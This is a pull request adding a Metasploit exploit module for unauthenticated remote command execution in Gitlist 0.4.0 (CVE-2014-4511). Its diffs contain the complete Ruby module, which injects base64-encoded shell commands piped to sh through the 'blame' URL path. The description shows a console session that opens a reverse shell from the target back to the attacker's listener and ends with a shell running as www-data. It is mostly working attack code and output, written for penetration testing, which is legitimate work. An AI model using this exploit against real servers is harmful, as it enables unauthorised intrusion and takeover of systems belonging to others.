### PR TITLE
Gitlist 0.4.0 Unauthenticated RCE

### DIFF
--- a/modules/exploits/linux/http/gitlist_exec.rb
+++ b/modules/exploits/linux/http/gitlist_exec.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The URI od the vulnerable instance', '/'])
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
       ], self.class)
   end
 

--- a/modules/exploits/linux/http/gitlist_exec.rb
+++ b/modules/exploits/linux/http/gitlist_exec.rb
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     res = send_command("echo${IFS}" + chk + "|base64${IFS}--decode")
 
-    if res and res.body.include?(Rex::Text.decode_base64(chk))
+    if res && res.body.include?(Rex::Text.decode_base64(chk))
       return Exploit::CheckCode::Vulnerable
     end
 

--- a/modules/exploits/linux/http/gitlist_exec.rb
+++ b/modules/exploits/linux/http/gitlist_exec.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'Compat'      =>
             {
               'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic netcat netcat-e python perl',
+              'RequiredCmd' => 'generic telnet python perl bash',
             }
         },
       'Targets'        =>

--- a/modules/exploits/linux/http/gitlist_exec.rb
+++ b/modules/exploits/linux/http/gitlist_exec.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
       in version 0.4.0 of Gitlist.
       },
       'License'        => MSF_LICENSE,
-      'Privileged'     => true,
+      'Privileged'     => false,
       'Platform'       => 'unix',
       'Arch'           => ARCH_CMD,
       'Author'         =>

--- a/modules/exploits/linux/http/gitlist_exec.rb
+++ b/modules/exploits/linux/http/gitlist_exec.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Gitlist Unauthenticated Command Execution',
+      'Description'    => %q{
+      This module exploit an unauthenticated remote command execution vulnerability
+      in version 0.4.0 of Gitlist.
+      },
+      'License'        => MSF_LICENSE,
+      'Privileged'     => true,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Author'         =>
+        [
+          '@dronesec', #discovery/poc
+          'Brandon Perry <bperry.volatile@gmail.com>' #Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-4511'],
+          ['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/'],
+          ['EDB', 'http://www.exploit-db.com/exploits/33929/']
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 9999, #arbitrary, length of GET request really
+          'BadChars'    => "", #base64 encode then execute
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic netcat netcat-e python perl',
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'none'
+        },
+      'Targets'        =>
+        [
+          ['Automatic Targeting', { 'auto' => true }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 30 2014'
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI od the vulnerable instance', '/'])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    if !res
+      fail_with("Server did not respond in an expected way")
+    end
+
+    first = /href="\/gitlist\/(.*)\/"/.match(res.body)
+
+    if !first or first.length < 2
+      fail_with("We don't have a properly configured Gitlist")
+    end
+
+    chk = Rex::Text.encode_base64(Rex::Text.rand_text_alpha(rand(32)+5))
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, first, 'blame', 'master', '%22%22`echo${IFS}' + chk + '|base64${IFS}--decode`')
+    })
+
+    if res and res.body =~ /#{Rex::Text.decode_base64(chk)}/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    pay = Rex::Text::encode_base64(payload.encoded)
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    if !res
+      fail_with("Server did not respond in an expected way")
+    end
+
+    first = /href="\/gitlist\/(.*)\/"/.match(res.body)
+
+    if !first or first.length < 2
+      fail_with("We don't have a properly configured Gitlist installation")
+    end
+
+    first = first[1]
+
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, first, 'blame', 'master', '%22%22`echo${IFS}' + pay + '|base64${IFS}--decode|sh`')
+    })
+  end
+
+end

--- a/modules/exploits/linux/http/gitlist_exec.rb
+++ b/modules/exploits/linux/http/gitlist_exec.rb
@@ -23,14 +23,14 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'           => ARCH_CMD,
       'Author'         =>
         [
-          '@dronesec', #discovery/poc
+          'drone', #discovery/poc @dronesec
           'Brandon Perry <bperry.volatile@gmail.com>' #Metasploit module
         ],
       'References'     =>
         [
           ['CVE', '2014-4511'],
           ['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/'],
-          ['EDB', 'http://www.exploit-db.com/exploits/33929/']
+          ['EDB', '33929']
         ],
       'Payload'        =>
         {

--- a/modules/exploits/linux/http/gitlist_exec.rb
+++ b/modules/exploits/linux/http/gitlist_exec.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Gitlist Unauthenticated Command Execution',
       'Description'    => %q{
-      This module exploit an unauthenticated remote command execution vulnerability
+      This module exploits an unauthenticated remote command execution vulnerability
       in version 0.4.0 of Gitlist.
       },
       'License'        => MSF_LICENSE,

--- a/modules/exploits/linux/http/gitlist_exec.rb
+++ b/modules/exploits/linux/http/gitlist_exec.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'           => ARCH_CMD,
       'Author'         =>
         [
-          'drone', #discovery/poc @dronesec
+          '@dronesec', #discovery/poc
           'Brandon Perry <bperry.volatile@gmail.com>' #Metasploit module
         ],
       'References'     =>
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Payload'        =>
         {
           'Space'       => 9999, #arbitrary, length of GET request really
-          'BadChars'    => "", #base64 encode then execute
+          'BadChars'    => "&\x20", 
           'DisableNops' => true,
           'Compat'      =>
             {
@@ -43,13 +43,9 @@ class Metasploit3 < Msf::Exploit::Remote
               'RequiredCmd' => 'generic netcat netcat-e python perl',
             }
         },
-      'DefaultOptions' =>
-        {
-          'ExitFunction' => 'none'
-        },
       'Targets'        =>
         [
-          ['Automatic Targeting', { 'auto' => true }]
+          ['Gitlist 0.4.0', { }]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jun 30 2014'
@@ -62,27 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path)
-    })
+    chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))
 
-    if !res
-      fail_with("Server did not respond in an expected way")
-    end
+    res = send_command("echo${IFS}" + chk + "|base64${IFS}--decode")
 
-    first = /href="\/gitlist\/(.*)\/"/.match(res.body)
-
-    if !first or first.length < 2
-      fail_with("We don't have a properly configured Gitlist")
-    end
-
-    chk = Rex::Text.encode_base64(Rex::Text.rand_text_alpha(rand(32)+5))
-
-    res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, first, 'blame', 'master', '%22%22`echo${IFS}' + chk + '|base64${IFS}--decode`')
-    })
-
-    if res and res.body =~ /#{Rex::Text.decode_base64(chk)}/
+    if res and res.body.include?(Rex::Text.decode_base64(chk))
       return Exploit::CheckCode::Vulnerable
     end
 
@@ -90,27 +70,31 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    pay = Rex::Text::encode_base64(payload.encoded)
+    send_command(payload.encoded)
+  end
 
+  def send_command(cmd) 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path)
     })
 
-    if !res
+    unless res
       fail_with("Server did not respond in an expected way")
     end
 
     first = /href="\/gitlist\/(.*)\/"/.match(res.body)
 
-    if !first or first.length < 2
+    unless first && first.length >= 2
       fail_with("We don't have a properly configured Gitlist installation")
     end
 
     first = first[1]
 
-    send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, first, 'blame', 'master', '%22%22`echo${IFS}' + pay + '|base64${IFS}--decode|sh`')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, first, 'blame', 'master', '""`' + cmd + '`')
     })
+
+    return res
   end
 
 end


### PR DESCRIPTION
You can get the vulnerable version here: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz

Exploit-DB: http://www.exploit-db.com/exploits/33929/

```
msf exploit(gitlist_exec) > show options

Module options (exploit/linux/http/gitlist_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.17     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /gitlist/        yes       The URI od the vulnerable instance
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.31     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(gitlist_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo DeVoMBnLnS3Tckfm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "DeVoMBnLnS3Tckfm\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 3 opened (192.168.1.31:4444 -> 192.168.1.17:32876) at 2014-06-30 20:13:14 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
